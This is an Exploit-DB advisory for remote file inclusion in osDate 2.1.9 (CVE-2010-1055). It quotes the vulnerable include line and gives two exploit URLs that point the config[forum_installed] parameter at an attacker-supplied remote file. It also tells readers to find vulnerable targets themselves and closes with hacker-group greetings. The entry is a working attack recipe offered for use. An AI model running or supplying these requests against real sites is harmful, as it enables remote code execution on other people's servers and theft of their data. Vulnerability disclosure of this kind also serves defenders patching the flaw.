osDate 2.1.9 - Remote File Inclusion Vulnerabilities

2010-03-15T00:00:00
ID EDB-ID:11755
Type exploitdb
Reporter NoGe
Modified 2010-03-15T00:00:00

Description

osDate v 2.1.9 - Remote File Inclusion Vulnerabilities. CVE-2010-1055. Webapps exploit for php platform

                                        
                                            ========================================================================================
[o] osDate Remote File Inclusion Vulnerabilities
Software : osDate dating and matchmaking script version 2.1.9 [mostly affected]
Vendor   : http://www.tufat.com/
Download : http://www.tufat.com/s_free_dating_system.htm
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com
Blog     : http://evilc0de.blogspot.com/
========================================================================================
[o] Vulnerable file
include_once($config['forum_installed'] . "_forum.php");
	forum/adminLogin.php
	forum/userLogin.php
[o] Exploit
       http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]
       http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]
[o] Dork
       cari ndiri yee.. gampang koq dork na.. :p
========================================================================================
[o] Greetz
       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella
       H312Y yooogy mousekill }^-^{ noname s4va stardustmemory
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
========================================================================================